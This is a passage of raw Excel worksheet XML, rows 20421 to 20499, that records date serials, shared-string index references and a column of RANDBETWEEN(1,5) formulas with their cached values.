      </c>
    </row>
    <row r="20421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20421" s="1">
        <v>43116.78875</v>
      </c>
      <c r="C20421" t="s">
        <v>301</v>
      </c>
      <c r="E20421" t="s">
        <v>18366</v>
      </c>
      <c r="F20421">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20422" s="1">
        <v>43116.725555555553</v>
      </c>
      <c r="C20422" t="s">
        <v>10</v>
      </c>
      <c r="D20422" t="s">
        <v>1160</v>
      </c>
      <c r="E20422" t="s">
        <v>18367</v>
      </c>
      <c r="F20422">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20423" s="1">
        <v>43116.694768518515</v>
      </c>
      <c r="C20423" t="s">
        <v>10</v>
      </c>
      <c r="D20423" t="s">
        <v>713</v>
      </c>
      <c r="E20423" t="s">
        <v>18368</v>
      </c>
      <c r="F20423">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20424" s="1">
        <v>43116.690381944441</v>
      </c>
      <c r="C20424" t="s">
        <v>10</v>
      </c>
      <c r="D20424" t="s">
        <v>271</v>
      </c>
      <c r="E20424" t="s">
        <v>18369</v>
      </c>
      <c r="F20424">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20425" s="1">
        <v>43116.646365740744</v>
      </c>
      <c r="C20425" t="s">
        <v>10</v>
      </c>
      <c r="D20425" t="s">
        <v>158</v>
      </c>
      <c r="E20425" t="s">
        <v>18370</v>
      </c>
      <c r="F20425">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20426" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20426" s="1">
        <v>43116.57472222222</v>
      </c>
      <c r="C20426" t="s">
        <v>10</v>
      </c>
      <c r="D20426" t="s">
        <v>14</v>
      </c>
      <c r="E20426" s="2" t="s">
        <v>18371</v>
      </c>
      <c r="F20426">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20427" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20427" s="1">
        <v>43116.570347222223</v>
      </c>
      <c r="C20427" t="s">
        <v>10</v>
      </c>
      <c r="D20427" t="s">
        <v>23</v>
      </c>
      <c r="E20427" s="2" t="s">
        <v>18372</v>
      </c>
      <c r="F20427">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20428" s="1">
        <v>43116.569490740738</v>
      </c>
      <c r="C20428" t="s">
        <v>10</v>
      </c>
      <c r="D20428" t="s">
        <v>6</v>
      </c>
      <c r="E20428" t="s">
        <v>18373</v>
      </c>
      <c r="F20428">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20429" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20429" s="1">
        <v>43116.566469907404</v>
      </c>
      <c r="C20429" t="s">
        <v>6</v>
      </c>
      <c r="D20429" t="s">
        <v>114</v>
      </c>
      <c r="E20429" s="2" t="s">
        <v>18374</v>
      </c>
      <c r="F20429">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20430" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20430" s="1">
        <v>43116.564479166664</v>
      </c>
      <c r="C20430" t="s">
        <v>10</v>
      </c>
      <c r="D20430" t="s">
        <v>20</v>
      </c>
      <c r="E20430" s="2" t="s">
        <v>18375</v>
      </c>
      <c r="F20430">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20431" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20431" s="1">
        <v>43116.55332175926</v>
      </c>
      <c r="C20431" t="s">
        <v>124</v>
      </c>
      <c r="E20431" s="2" t="s">
        <v>18376</v>
      </c>
      <c r="F20431">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20432" s="1">
        <v>43116.547129629631</v>
      </c>
      <c r="C20432" t="s">
        <v>2082</v>
      </c>
      <c r="F20432">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20433" s="1">
        <v>43116.515682870369</v>
      </c>
      <c r="C20433" t="s">
        <v>6</v>
      </c>
      <c r="D20433" t="s">
        <v>114</v>
      </c>
      <c r="E20433" t="s">
        <v>18377</v>
      </c>
      <c r="F20433">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20434" s="1">
        <v>43116.501643518517</v>
      </c>
      <c r="C20434" t="s">
        <v>10</v>
      </c>
      <c r="D20434" t="s">
        <v>23</v>
      </c>
      <c r="E20434" t="s">
        <v>18378</v>
      </c>
      <c r="F20434">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20435" s="1">
        <v>43116.497430555559</v>
      </c>
      <c r="C20435" t="s">
        <v>10</v>
      </c>
      <c r="D20435" t="s">
        <v>993</v>
      </c>
      <c r="E20435" t="s">
        <v>18379</v>
      </c>
      <c r="F20435">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20436" s="1">
        <v>43116.495393518519</v>
      </c>
      <c r="C20436" t="s">
        <v>82</v>
      </c>
      <c r="E20436" t="s">
        <v>18380</v>
      </c>
      <c r="F20436">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20437" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20437" s="1">
        <v>43116.484537037039</v>
      </c>
      <c r="C20437" t="s">
        <v>10</v>
      </c>
      <c r="D20437" t="s">
        <v>263</v>
      </c>
      <c r="E20437" s="2" t="s">
        <v>18381</v>
      </c>
      <c r="F20437">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20438" s="1">
        <v>43116.474756944444</v>
      </c>
      <c r="C20438" t="s">
        <v>10</v>
      </c>
      <c r="D20438" t="s">
        <v>36</v>
      </c>
      <c r="E20438" t="s">
        <v>18382</v>
      </c>
      <c r="F20438">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20439" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20439" s="1">
        <v>43116.451817129629</v>
      </c>
      <c r="C20439" t="s">
        <v>10</v>
      </c>
      <c r="D20439" t="s">
        <v>17</v>
      </c>
      <c r="E20439" s="2" t="s">
        <v>18383</v>
      </c>
      <c r="F20439">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20440" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20440" s="1">
        <v>43116.432916666665</v>
      </c>
      <c r="C20440" t="s">
        <v>48</v>
      </c>
      <c r="E20440" s="2" t="s">
        <v>18384</v>
      </c>
      <c r="F20440">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20441" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20441" s="1">
        <v>43116.43</v>
      </c>
      <c r="C20441" t="s">
        <v>48</v>
      </c>
      <c r="E20441" s="2" t="s">
        <v>18385</v>
      </c>
      <c r="F20441">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20442" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20442" s="1">
        <v>43116.386747685188</v>
      </c>
      <c r="C20442" t="s">
        <v>124</v>
      </c>
      <c r="E20442" s="2" t="s">
        <v>18386</v>
      </c>
      <c r="F20442">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20443" s="1">
        <v>43116.327615740738</v>
      </c>
      <c r="C20443" t="s">
        <v>134</v>
      </c>
      <c r="E20443" t="s">
        <v>18387</v>
      </c>
      <c r="F20443">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20444" s="1">
        <v>43116.321215277778</v>
      </c>
      <c r="C20444" t="s">
        <v>48</v>
      </c>
      <c r="E20444" t="s">
        <v>18388</v>
      </c>
      <c r="F20444">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20445" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20445" s="1">
        <v>43116.312118055554</v>
      </c>
      <c r="C20445" t="s">
        <v>124</v>
      </c>
      <c r="E20445" s="2" t="s">
        <v>18389</v>
      </c>
      <c r="F20445">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20446" s="1">
        <v>43116.279351851852</v>
      </c>
      <c r="C20446" t="s">
        <v>41</v>
      </c>
      <c r="E20446" t="s">
        <v>18390</v>
      </c>
      <c r="F20446">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20447" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20447" s="1">
        <v>43116.258194444446</v>
      </c>
      <c r="C20447" t="s">
        <v>69</v>
      </c>
      <c r="E20447" s="2" t="s">
        <v>18391</v>
      </c>
      <c r="F20447">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20448" s="1">
        <v>43116.234560185185</v>
      </c>
      <c r="C20448" t="s">
        <v>124</v>
      </c>
      <c r="F20448">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20449" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20449" s="1">
        <v>43116.221354166664</v>
      </c>
      <c r="C20449" t="s">
        <v>71</v>
      </c>
      <c r="D20449" t="s">
        <v>312</v>
      </c>
      <c r="E20449" s="2" t="s">
        <v>18392</v>
      </c>
      <c r="F20449">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20450" s="1">
        <v>43116.215451388889</v>
      </c>
      <c r="C20450" t="s">
        <v>166</v>
      </c>
      <c r="E20450" t="s">
        <v>2446</v>
      </c>
      <c r="F20450">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20451" s="1">
        <v>43116.202511574076</v>
      </c>
      <c r="C20451" t="s">
        <v>1080</v>
      </c>
      <c r="E20451" t="s">
        <v>18393</v>
      </c>
      <c r="F20451">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20452" s="1">
        <v>43116.199791666666</v>
      </c>
      <c r="C20452" t="s">
        <v>173</v>
      </c>
      <c r="E20452" t="s">
        <v>18394</v>
      </c>
      <c r="F20452">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20453" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20453" s="1">
        <v>43116.157314814816</v>
      </c>
      <c r="C20453" t="s">
        <v>71</v>
      </c>
      <c r="D20453" t="s">
        <v>312</v>
      </c>
      <c r="E20453" s="2" t="s">
        <v>18395</v>
      </c>
      <c r="F20453">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20454" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20454" s="1">
        <v>43116.111284722225</v>
      </c>
      <c r="C20454" t="s">
        <v>140</v>
      </c>
      <c r="D20454" t="s">
        <v>46</v>
      </c>
      <c r="E20454" s="2" t="s">
        <v>18396</v>
      </c>
      <c r="F20454">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20455" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20455" s="1">
        <v>43116.017233796294</v>
      </c>
      <c r="C20455" t="s">
        <v>197</v>
      </c>
      <c r="E20455" s="2" t="s">
        <v>18397</v>
      </c>
      <c r="F20455">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20456" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20456" s="1">
        <v>43115.979733796295</v>
      </c>
      <c r="C20456" t="s">
        <v>197</v>
      </c>
      <c r="E20456" s="2" t="s">
        <v>18398</v>
      </c>
      <c r="F20456">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20457" s="1">
        <v>43115.928715277776</v>
      </c>
      <c r="C20457" t="s">
        <v>477</v>
      </c>
      <c r="D20457" t="s">
        <v>36</v>
      </c>
      <c r="E20457" t="s">
        <v>18399</v>
      </c>
      <c r="F20457">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20458" s="1">
        <v>43115.776319444441</v>
      </c>
      <c r="C20458" t="s">
        <v>10</v>
      </c>
      <c r="D20458" t="s">
        <v>6</v>
      </c>
      <c r="E20458" t="s">
        <v>18400</v>
      </c>
      <c r="F20458">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20459" s="1">
        <v>43115.759930555556</v>
      </c>
      <c r="C20459" t="s">
        <v>10</v>
      </c>
      <c r="D20459" t="s">
        <v>23</v>
      </c>
      <c r="E20459" t="s">
        <v>18401</v>
      </c>
      <c r="F20459">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20460" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20460" s="1">
        <v>43115.677361111113</v>
      </c>
      <c r="C20460" t="s">
        <v>10</v>
      </c>
      <c r="D20460" t="s">
        <v>36</v>
      </c>
      <c r="E20460" s="2" t="s">
        <v>18402</v>
      </c>
      <c r="F20460">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20461" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20461" s="1">
        <v>43115.676342592589</v>
      </c>
      <c r="C20461" t="s">
        <v>6</v>
      </c>
      <c r="D20461" t="s">
        <v>821</v>
      </c>
      <c r="E20461" s="2" t="s">
        <v>18403</v>
      </c>
      <c r="F20461">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20462" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20462" s="1">
        <v>43115.665254629632</v>
      </c>
      <c r="C20462" t="s">
        <v>1440</v>
      </c>
      <c r="E20462" s="2" t="s">
        <v>18404</v>
      </c>
      <c r="F20462">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20463" s="1">
        <v>43115.653298611112</v>
      </c>
      <c r="C20463" t="s">
        <v>10</v>
      </c>
      <c r="D20463" t="s">
        <v>178</v>
      </c>
      <c r="E20463" t="s">
        <v>18405</v>
      </c>
      <c r="F20463">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20464" s="1">
        <v>43115.642233796294</v>
      </c>
      <c r="C20464" t="s">
        <v>10</v>
      </c>
      <c r="D20464" t="s">
        <v>107</v>
      </c>
      <c r="E20464" t="s">
        <v>18406</v>
      </c>
      <c r="F20464">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20465" s="1">
        <v>43115.63417824074</v>
      </c>
      <c r="C20465" t="s">
        <v>10</v>
      </c>
      <c r="D20465" t="s">
        <v>20</v>
      </c>
      <c r="E20465" t="s">
        <v>18407</v>
      </c>
      <c r="F20465">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20466" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20466" s="1">
        <v>43115.588807870372</v>
      </c>
      <c r="C20466" t="s">
        <v>10</v>
      </c>
      <c r="D20466" t="s">
        <v>52</v>
      </c>
      <c r="E20466" s="2" t="s">
        <v>18408</v>
      </c>
      <c r="F20466">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20467" s="1">
        <v>43115.582349537035</v>
      </c>
      <c r="C20467" t="s">
        <v>10</v>
      </c>
      <c r="D20467" t="s">
        <v>86</v>
      </c>
      <c r="E20467" t="s">
        <v>18409</v>
      </c>
      <c r="F20467">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20468" s="1">
        <v>43115.536412037036</v>
      </c>
      <c r="C20468" t="s">
        <v>10</v>
      </c>
      <c r="D20468" t="s">
        <v>271</v>
      </c>
      <c r="E20468" t="s">
        <v>18410</v>
      </c>
      <c r="F20468">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20469" s="1">
        <v>43115.524178240739</v>
      </c>
      <c r="C20469" t="s">
        <v>6</v>
      </c>
      <c r="D20469" t="s">
        <v>25</v>
      </c>
      <c r="E20469" t="s">
        <v>18411</v>
      </c>
      <c r="F20469">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20470" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20470" s="1">
        <v>43115.514236111114</v>
      </c>
      <c r="C20470" t="s">
        <v>48</v>
      </c>
      <c r="E20470" s="2" t="s">
        <v>18412</v>
      </c>
      <c r="F20470">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20471" s="1">
        <v>43115.511886574073</v>
      </c>
      <c r="C20471" t="s">
        <v>10</v>
      </c>
      <c r="D20471" t="s">
        <v>86</v>
      </c>
      <c r="E20471" t="s">
        <v>18413</v>
      </c>
      <c r="F20471">
        <f t="shared" ca="1" si="319"/>
        <v>4</v>
      </c>
    </row>
    <row r="20472" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20472" s="1">
        <v>43115.511631944442</v>
      </c>
      <c r="C20472" t="s">
        <v>471</v>
      </c>
      <c r="E20472" s="2" t="s">
        <v>18414</v>
      </c>
      <c r="F20472">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20473" s="1">
        <v>43115.506562499999</v>
      </c>
      <c r="C20473" t="s">
        <v>10</v>
      </c>
      <c r="D20473" t="s">
        <v>11</v>
      </c>
      <c r="E20473" t="s">
        <v>18415</v>
      </c>
      <c r="F20473">
        <f t="shared" ca="1" si="319"/>
        <v>3</v>
      </c>
    </row>
    <row r="20474" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20474" s="1">
        <v>43115.494722222225</v>
      </c>
      <c r="C20474" t="s">
        <v>48</v>
      </c>
      <c r="E20474" s="2" t="s">
        <v>18416</v>
      </c>
      <c r="F20474">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20475" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20475" s="1">
        <v>43115.4921412037</v>
      </c>
      <c r="C20475" t="s">
        <v>41</v>
      </c>
      <c r="E20475" s="2" t="s">
        <v>18417</v>
      </c>
      <c r="F20475">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20476" s="1">
        <v>43115.480925925927</v>
      </c>
      <c r="C20476" t="s">
        <v>48</v>
      </c>
      <c r="E20476" t="s">
        <v>18418</v>
      </c>
      <c r="F20476">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20477" s="1">
        <v>43115.470393518517</v>
      </c>
      <c r="C20477" t="s">
        <v>10</v>
      </c>
      <c r="D20477" t="s">
        <v>163</v>
      </c>
      <c r="E20477" t="s">
        <v>18419</v>
      </c>
      <c r="F20477">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20478" s="1">
        <v>43115.445532407408</v>
      </c>
      <c r="C20478" t="s">
        <v>178</v>
      </c>
      <c r="E20478" t="s">
        <v>18420</v>
      </c>
      <c r="F20478">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
      </c>
    </row>
    <row r="20479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20479" s="1">
        <v>43115.415243055555</v>
      </c>
      <c r="C20479" t="s">
        <v>10</v>
      </c>
      <c r="D20479" t="s">
        <v>14</v>
      </c>
      <c r="E20479" t="s">
        <v>18421</v>
      </c>
      <c r="F20479">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20480" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20480" s="1">
        <v>43115.366157407407</v>
      </c>
      <c r="C20480" t="s">
        <v>2082</v>
      </c>
      <c r="D20480" t="s">
        <v>71</v>
      </c>
      <c r="E20480" s="2" t="s">
        <v>18422</v>
      </c>
      <c r="F20480">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20481" s="1">
        <v>43115.35050925926</v>
      </c>
      <c r="C20481" t="s">
        <v>6</v>
      </c>
      <c r="D20481" t="s">
        <v>25</v>
      </c>
      <c r="E20481" t="s">
        <v>18423</v>
      </c>
      <c r="F20481">
        <f t="shared" ca="1" si="319"/>
        <v>1</v>
      </c>
    </row>
    <row r="20482" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20482" s="1">
        <v>43115.325486111113</v>
      </c>
      <c r="C20482" t="s">
        <v>41</v>
      </c>
      <c r="E20482" s="2" t="s">
        <v>18424</v>
      </c>
      <c r="F20482">
        <f t="shared" ref="F20482:F20545" ca="1" si="320">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="20483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20483" s="1">
        <v>43115.319861111115</v>
      </c>
      <c r="C20483" t="s">
        <v>71</v>
      </c>
      <c r="E20483" t="s">
        <v>18425</v>
      </c>
      <c r="F20483">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20484" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20484" s="1">
        <v>43115.311377314814</v>
      </c>
      <c r="C20484" t="s">
        <v>10</v>
      </c>
      <c r="D20484" t="s">
        <v>271</v>
      </c>
      <c r="E20484" s="2" t="s">
        <v>18426</v>
      </c>
      <c r="F20484">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20485" s="1">
        <v>43115.303460648145</v>
      </c>
      <c r="C20485" t="s">
        <v>1199</v>
      </c>
      <c r="D20485" t="s">
        <v>713</v>
      </c>
      <c r="E20485" t="s">
        <v>18427</v>
      </c>
      <c r="F20485">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20486" s="1">
        <v>43115.276226851849</v>
      </c>
      <c r="C20486" t="s">
        <v>173</v>
      </c>
      <c r="E20486" t="s">
        <v>18428</v>
      </c>
      <c r="F20486">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20487" s="1">
        <v>43115.256458333337</v>
      </c>
      <c r="C20487" t="s">
        <v>173</v>
      </c>
      <c r="E20487" t="s">
        <v>18429</v>
      </c>
      <c r="F20487">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20488" s="1">
        <v>43115.230173611111</v>
      </c>
      <c r="C20488" t="s">
        <v>477</v>
      </c>
      <c r="E20488" t="s">
        <v>18430</v>
      </c>
      <c r="F20488">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20489" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20489" s="1">
        <v>43115.224502314813</v>
      </c>
      <c r="C20489" t="s">
        <v>10</v>
      </c>
      <c r="D20489" t="s">
        <v>36</v>
      </c>
      <c r="E20489" s="2" t="s">
        <v>18431</v>
      </c>
      <c r="F20489">
        <f t="shared" ca="1" si="320"/>
        <v>2</v>
      </c>
    </row>
    <row r="20490" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A20490" s="1">
        <v>43115.205081018517</v>
      </c>
      <c r="C20490" t="s">
        <v>430</v>
      </c>
      <c r="E20490" s="2" t="s">
        <v>18432</v>
      </c>
      <c r="F20490">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20491" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20491" s="1">
        <v>43115.194664351853</v>
      </c>
      <c r="C20491" t="s">
        <v>71</v>
      </c>
      <c r="E20491" s="2" t="s">
        <v>18433</v>
      </c>
      <c r="F20491">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20492" s="1">
        <v>43115.172881944447</v>
      </c>
      <c r="C20492" t="s">
        <v>73</v>
      </c>
      <c r="E20492" t="s">
        <v>18434</v>
      </c>
      <c r="F20492">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20493" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20493" s="1">
        <v>43115.140682870369</v>
      </c>
      <c r="C20493" t="s">
        <v>140</v>
      </c>
      <c r="D20493" t="s">
        <v>46</v>
      </c>
      <c r="E20493" s="2" t="s">
        <v>18435</v>
      </c>
      <c r="F20493">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20494" s="1">
        <v>43115.093634259261</v>
      </c>
      <c r="C20494" t="s">
        <v>318</v>
      </c>
      <c r="E20494" t="s">
        <v>18436</v>
      </c>
      <c r="F20494">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
    </row>
    <row r="20495" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20495" s="1">
        <v>43115.092615740738</v>
      </c>
      <c r="C20495" t="s">
        <v>1077</v>
      </c>
      <c r="E20495" s="2" t="s">
        <v>18437</v>
      </c>
      <c r="F20495">
        <f t="shared" ca="1" si="320"/>
        <v>1</v>
      </c>
    </row>
    <row r="20496" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20496" s="1">
        <v>43115.080451388887</v>
      </c>
      <c r="C20496" t="s">
        <v>410</v>
      </c>
      <c r="E20496" s="2" t="s">
        <v>18438</v>
      </c>
      <c r="F20496">
        <f t="shared" ca="1" si="320"/>
        <v>3</v>
      </c>
    </row>
    <row r="20497" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20497" s="1">
        <v>43115.072951388887</v>
      </c>
      <c r="C20497" t="s">
        <v>10</v>
      </c>
      <c r="D20497" t="s">
        <v>23</v>
      </c>
      <c r="E20497" s="2" t="s">
        <v>18439</v>
      </c>
      <c r="F20497">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20498" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20498" s="1">
        <v>43114.890138888892</v>
      </c>
      <c r="C20498" t="s">
        <v>408</v>
      </c>
      <c r="E20498" s="2" t="s">
        <v>18440</v>
      </c>
      <c r="F20498">
        <f t="shared" ca="1" si="320"/>
        <v>4</v>
      </c>
    </row>
    <row r="20499" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20499" s="1">
        <v>43114.665706018517</v>
      </c>
      <c r="C20499" t="s">
        <v>10</v>
      </c>
      <c r="D20499" t="s">
        <v>36</v>
      </c>
      <c r="E20499" s="2" t="s">
        <v>18441</v>
      </c>
      <c r="F20499">
        <f t="shared" ca="1" si="320"/>
        <v>5</v>
      </c>
